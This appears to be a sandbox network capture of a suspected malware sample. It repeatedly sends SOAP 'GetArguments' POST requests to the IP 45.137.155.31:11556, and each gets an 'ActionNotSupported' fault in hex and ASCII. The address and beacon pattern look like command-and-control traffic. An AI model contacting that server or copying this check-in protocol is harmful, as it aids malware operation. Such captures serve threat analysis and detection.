                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:31.653213024 CEST10646OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:31.722610950 CEST10646INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:31.792079926 CEST10647INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:31 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:32.809696913 CEST10647OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:32.879889011 CEST10647INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:32.952064037 CEST10648INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:32 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:33.966211081 CEST10649OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:34.043320894 CEST10649INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:34.113029003 CEST10650INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:33 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:35.123120070 CEST10650OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:35.192059994 CEST10650INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:35.268318892 CEST10651INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:34 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:36.278768063 CEST10660OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:36.350203991 CEST10660INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:36.421967983 CEST10661INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:36 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:37.435059071 CEST10672OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:37.511215925 CEST10672INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:37.586996078 CEST10673INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:37 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:38.591972113 CEST10673OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:38.661401987 CEST10673INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:38.733601093 CEST10674INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:38 GMT
